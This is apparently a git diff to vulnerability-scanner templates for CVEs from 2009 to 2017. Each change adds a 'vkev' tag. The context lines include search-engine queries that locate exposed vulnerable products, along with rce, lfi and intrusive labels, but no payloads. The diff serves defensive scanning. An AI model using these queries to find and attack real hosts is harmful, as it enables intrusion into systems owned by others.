da49daeb016..1423b090ce6 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"zeroshell" fofa-query: title="zeroshell" google-query: intitle:"zeroshell" - tags: cve,cve2009,edb,zeroshell,kerbynet,rce + tags: cve,cve2009,edb,zeroshell,kerbynet,rce,vkev http: - method: GET diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 425a3d7a0ef..c52286d0d79 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -36,7 +36,7 @@ info: - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce + tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce,vkev http: - raw: diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index ffc7c530e2a..f2ced89d594 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: wvc54gca - tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb + tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb,vkev http: - method: GET diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index c950b1f81e5..78e23ccb4cc 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -37,7 +37,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve2009,cve,adobe,xss,coldfusion,tenable + tags: cve2009,cve,adobe,xss,coldfusion,tenable,vkev http: - method: GET diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 30f3630782d..4485ae035bc 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -31,7 +31,7 @@ info: - http.html:"Apache Axis" - http.html:"apache axis" fofa-query: body="apache axis" - tags: cve,cve2010,axis,apache,default-login,axis2 + tags: cve,cve2010,axis,apache,default-login,axis2,vkev http: - raw: diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index ffd94f9852b..52bee4dd2a6 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -35,7 +35,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi + tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi,vkev http: - method: GET diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 4e25163ab0b..55e8cc5e97f 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cisco product: unified_ip_interactive_voice_response - tags: cve,cve2011,lfi,cisco,edb + tags: cve,cve2011,lfi,cisco,edb,vkev http: - method: GET diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 8cb6cc5e3f9..666aac5b45c 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -28,7 +28,7 @@ info: vendor: bueltge product: adminimize google-query: "inurl:\"/wp-content/plugins/adminimize/\"" - tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge + tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge,vkev flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index f9f35b99776..457eeac2f28 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -29,7 +29,7 @@ info: vendor: php product: php shodan-query: cpe:"cpe:2.3:a:php:php" - tags: cve,cve2012,kev,vulhub,rce,php + tags: cve,cve2012,kev,vulhub,rce,php,vkev variables: string: "CVE-2012-1823" diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 6bda7adaea6..ace0246e8cf 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -37,7 +37,7 @@ info: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" - tags: cve,cve2012,oracle,rce,edb + tags: cve,cve2012,oracle,rce,edb,vkev http: - method: GET diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index de6f76ec395..591497ffb88 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: gecad product: axigen_free_mail_server - tags: cve,cve2012,edb,axigen,lfi,mail,gecad + tags: cve,cve2012,edb,axigen,lfi,mail,gecad,vkev http: - method: GET diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index aae34fb5a3f..3e6d6266258 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -35,7 +35,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2013,cve,rce,struts,apache,ognl,kev + tags: cve2013,cve,rce,struts,apache,ognl,kev,vkev http: - raw: diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index f132ca01fae..cd84da20395 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -32,7 +32,7 @@ info: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" - tags: cve,cve2013,edb,lfi,javafaces,oracle + tags: cve,cve2013,edb,lfi,javafaces,oracle,vkev http: - method: GET diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 54a4d019937..11778aa1b03 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor + tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor,vkev http: - method: GET diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 47ae9f2e92b..bc1de1838b1 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -29,7 +29,7 @@ info: vendor: zte product: f460 shodan-query: cpe:"cpe:2.3:h:zte:f460" - tags: cve2014,cve,iot,zte + tags: cve2014,cve,iot,zte,vkev http: - method: GET diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index c024df67d40..5054d4e6cb0 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -29,7 +29,7 @@ info: max-request: 11 vendor: dompdf product: dompdf - tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists + tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists,vkev http: - method: GET diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index fad71059587..6de4b059b00 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: siemens product: simatic_s7_cpu_1200_firmware - tags: cve2014,cve,xss,siemens,edb + tags: cve2014,cve,xss,siemens,edb,vkev http: - method: GET diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index e24675a5647..caa55ff5594 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -29,7 +29,7 @@ info: vendor: elasticsearch product: elasticsearch fofa-query: index_not_found_exception - tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic + tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic,vkev http: - raw: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 2dcf8fbca2f..8c918bc0c0b 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: seagate product: blackarmor_nas_220_firmware - tags: cve2014,cve,seagate,rce,edb + tags: cve2014,cve,seagate,rce,edb,vkev http: - raw: diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index b17a2b5dc3a..e54b3a4bb29 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve2014,cve,edb,drupal,sqli + tags: cve2014,cve,edb,drupal,sqli,vkev variables: num: "999999999" diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 30a7c3ddf89..41e5e82eb1a 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -27,7 +27,7 @@ info: vendor: "import_legacy_media_project" product: "import_legacy_media" framework: wordpress - tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project,vkev flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 0db33b93965..f0b01d83d0e 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -27,7 +27,7 @@ info: max-request: 8 vendor: gnu product: bash - tags: cve2014,cve,rce,shellshock,kev,gnu + tags: cve2014,cve,rce,shellshock,kev,gnu,vkev http: - method: GET diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index bfdaa5f92a0..cf19e35cde0 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -31,7 +31,7 @@ info: product: http_file_server shodan-query: http.favicon.hash:2124459909 fofa-query: icon_hash=2124459909 - tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto + tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto,vkev variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' diff --git a/http/cves/2014/CVE-2014-8739.yaml b/http/cves/2014/CVE-2014-8739.yaml index 786509b29a8..76dd806401f 100644 --- a/http/cves/2014/CVE-2014-8739.yaml +++ b/http/cves/2014/CVE-2014-8739.yaml @@ -27,7 +27,7 @@ info: product: creative_contact_form framework: wordpress publicwww-query: "/wp-content/plugins/sexy-contact-form/" - tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce + tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce,vkev flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-9735.yaml b/http/cves/2014/CVE-2014-9735.yaml index ab6f8c79a5e..9c38ab428a7 100644 --- a/http/cves/2014/CVE-2014-9735.yaml +++ b/http/cves/2014/CVE-2014-9735.yaml @@ -24,7 +24,7 @@ info: vendor: themepunch product: showbiz_pro framework: wordpress - tags: cve,cve2014,wordpress,revslider,fileupload,rce,plugin,wp,unauth,intrusive + tags: cve,cve2014,wordpress,revslider,fileupload,rce,plugin,wp,unauth,intrusive,vkev variables: marker: "{{randstr}}" diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 9fa3ce67e6d..45e4c9ca556 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -28,7 +28,7 @@ info: vendor: elasticsearch product: elasticsearch fofa-query: index_not_found_exception - tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev + tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev,vkev http: - raw: diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 6757fdfa40a..644318955df 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -30,7 +30,7 @@ info: product: divi framework: wordpress google-query: inurl:/wp-content/plugins/revslider - tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes + tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index f3a6d316602..b4e219d27d2 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -29,7 +29,7 @@ info: - '"Microsoft-IIS" "2015"' - '"microsoft-iis" "2015"' - cpe:"cpe:2.3:o:microsoft:windows_7" - tags: cve,cve2015,kev,microsoft,iis,rce + tags: cve,cve2015,kev,microsoft,iis,rce,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index cb13abde84f..5df43540c02 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Magento" - http.component:"magento" - tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server + tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index d3c40b74d68..37c602157ac 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: kaseya product: virtual_system_administrator - tags: cve2015,cve,redirect,kaseya + tags: cve2015,cve,redirect,kaseya,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 10455d9781b..f5077d9fded 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -34,7 +34,7 @@ info: - http.title:"tp-link" fofa-query: title="tp-link" google-query: intitle:"tp-link" - tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link + tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 24d4ed09f27..47b92f50e56 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: bonitasoft product: bonita_bpm_portal - tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft + tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index bd1382898d8..a77a2e4eb39 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -28,7 +28,7 @@ info: vendor: helpdesk_pro_project product: helpdesk_pro framework: joomla\! - tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss + tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index bdeb230e16f..873dd744d94 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -23,7 +23,7 @@ info: vendor: "aviary_image_editor_add-on_for_gravity_forms_project" product: "aviary_image_editor_add-on_for_gravity_forms" framework: wordpress - tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project + tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project,vkev variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index a5072760b10..dff919b3fdc 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -28,7 +28,7 @@ info: vendor: elasticsearch product: elasticsearch fofa-query: index_not_found_exception - tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive + tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive,vkev http: - raw: diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index f6fbb08aad1..73b1b33e288 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -31,7 +31,7 @@ info: - http.html:"IBM WebSphere Portal" - http.html:"ibm websphere portal" fofa-query: body="ibm websphere portal" - tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev + tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev,vkev http: - raw: diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index 420d22a70cc..70797abb600 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -24,7 +24,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve,cve2015,joomla,rce,unauth + tags: cve,cve2015,joomla,rce,unauth,vkev flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 603b99efbd9..03073aed162 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: umbraco product: umbraco - tags: cve2015,cve,ssrf,oast,umbraco + tags: cve2015,cve,ssrf,oast,umbraco,vkev http: - method: GET diff --git a/http/cves/2015/CVE-2015-9499.yaml b/http/cves/2015/CVE-2015-9499.yaml index 5ee219d4795..ad186a6f0bc 100644 --- a/http/cves/2015/CVE-2015-9499.yaml +++ b/http/cves/2015/CVE-2015-9499.yaml @@ -24,7 +24,7 @@ info: vendor: themepunch product: showbiz_pro framework: wordpress - tags: cve,cve2015,wpscan,packetstorm,wp,wordpress,wp-plugin,showbiz,uplo,intrusive + tags: cve,cve2015,wpscan,packetstorm,wp,wordpress,wp-plugin,showbiz,uplo,intrusive,vkev variables: marker: "{{randstr}}" diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 9e3c91c9e01..e70e8ca7a8f 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -28,7 +28,7 @@ info: vendor: "simpel-reserveren_project" product: "simpel-reserveren" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project + tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project,vkev flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index e7271bfefd3..0a08bd94b1b 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: phpmailer_project product: phpmailer - tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project,kev + tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project,kev,vkev http: - raw: diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index fff61dd0c5f..50505430a38 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -29,7 +29,7 @@ info: product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 fofa-query: icon_hash=-1074357885 - tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital + tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital,vkev http: - raw: diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index b69f3558464..0bd5a2dce98 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -33,7 +33,7 @@ info: - http.title:"opsview" fofa-query: title="opsview" google-query: intitle:"opsview" - tags: cve2016,cve,opsview,lfi + tags: cve2016,cve,opsview,lfi,vkev http: - method: GET diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 082ca72e06b..1166168cc2b 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -30,7 +30,7 @@ info: product: zedna_ebook_download framework: wordpress google-query: inurl:"/wp-content/plugins/ebook-download" - tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project + tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project,vkev http: - method: GET diff --git a/http/cves/2016/CVE-2016-15042.yaml b/http/cves/2016/CVE-2016-15042.yaml index 95d30157c0f..af424ea4dad 100644 --- a/http/cves/2016/CVE-2016-15042.yaml +++ b/http/cves/2016/CVE-2016-15042.yaml @@ -26,7 +26,7 @@ info: vendor: najeebmedia product: frontend_file_manager framework: wordpress - tags: cve,cve2016,wordpress,wp-plugin,n-media,post-frontend,intrusive,unauth,file-upload + tags: cve,cve2016,wordpress,wp-plugin,n-media,post-frontend,intrusive,unauth,file-upload,vkev variables: randstr_name: "{{randstr}}" diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 2e5f0def348..e551158348a 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: wnap320_firmware - tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev + tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev,vkev http: - raw: diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 140e97e3dbd..0999564bcec 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -31,7 +31,7 @@ info: - http.favicon.hash:-266008933 - cpe:"cpe:2.3:a:sap:netweaver" fofa-query: icon_hash=-266008933 - tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb + tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb,vkev http: - method: GET diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 0ce5ca00d4c..3e5ff78610e 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -30,7 +30,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:activemq" - product:"activemq openwire transport" - tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive + tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive,vkev variables: rand1: '{{rand_int(11111111, 99999999)}}' diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 1523ce478ad..fa60b50786b 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: shiro - tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast + tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast,vkev http: - raw: diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index afe59a49544..80b5546ad9c 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: pivotal product: spring_security_oauth - tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal + tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal,vkev http: - method: GET diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 8a3d2142489..73f6921fee5 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -25,7 +25,7 @@ info: fofa-query: - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\"" - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login" - tags: cve,cve2016,nuuo,rce,netgear + tags: cve,cve2016,nuuo,rce,netgear,vkev variables: rand: "{{to_lower(rand_text_alpha(32))}}" diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index afb77c0d1e8..c33efedacd0 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -41,7 +41,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve2016,cve,vbulletin,sqli,forum,edb + tags: cve2016,cve,vbulletin,sqli,forum,edb,vkev http: - method: GET diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 53e4fac319c..df408a53bae 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: d6220_firmware - tags: cve2016,cve,netgear,rce,iot,kev + tags: cve2016,cve,netgear,rce,iot,kev,vkev http: - method: GET diff --git a/http/cves/2016/CVE-2016-8735.yaml b/http/cves/2016/CVE-2016-8735.yaml index 5dbdae660cd..84e1e751f46 100644 --- a/http/cves/2016/CVE-2016-8735.yaml +++ b/http/cves/2016/CVE-2016-8735.yaml @@ -20,7 +20,7 @@ info: shodan-query: product:"tomcat" vendor: apache product: tomcat - tags: cve,cve2016,apache,tomcat,rce,kev + tags: cve,cve2016,apache,tomcat,rce,kev,vkev variables: OAST: "{{interactsh-url}}" diff --git a/http/cves/2016/CVE-2016-9299.yaml b/http/cves/2016/CVE-2016-9299.yaml index b3505eb7ca0..55557b96531 100644 --- a/http/cves/2016/CVE-2016-9299.yaml +++ b/http/cves/2016/CVE-2016-9299.yaml @@ -24,7 +24,7 @@ info: product: jenkins shodan-query: product:"jenkins" fofa-query: icon_hash=81586312 - tags: cve,cve2016,rce,deserialization + tags: cve,cve2016,rce,deserialization,vkev variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index dac6ad4b0d2..351c752fdd1 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -28,7 +28,7 @@ info: vendor: dnnsoftware product: dotnetnuke fofa-query: app="dotnetnuke" - tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware + tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index c71d8882312..3ffffb6a428 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -26,7 +26,7 @@ info: vendor: oracle product: glassfish_server shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" - tags: cve,cve2017,oracle,glassfish,lfi,edb + tags: cve,cve2017,oracle,glassfish,lfi,edb,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 25be555db8a..f75a48b6b26 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jqueryfiletree_project product: jqueryfiletree - tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project + tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project,vkev http: - method: POST diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 95042448d4f..cbabf25f35e 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ 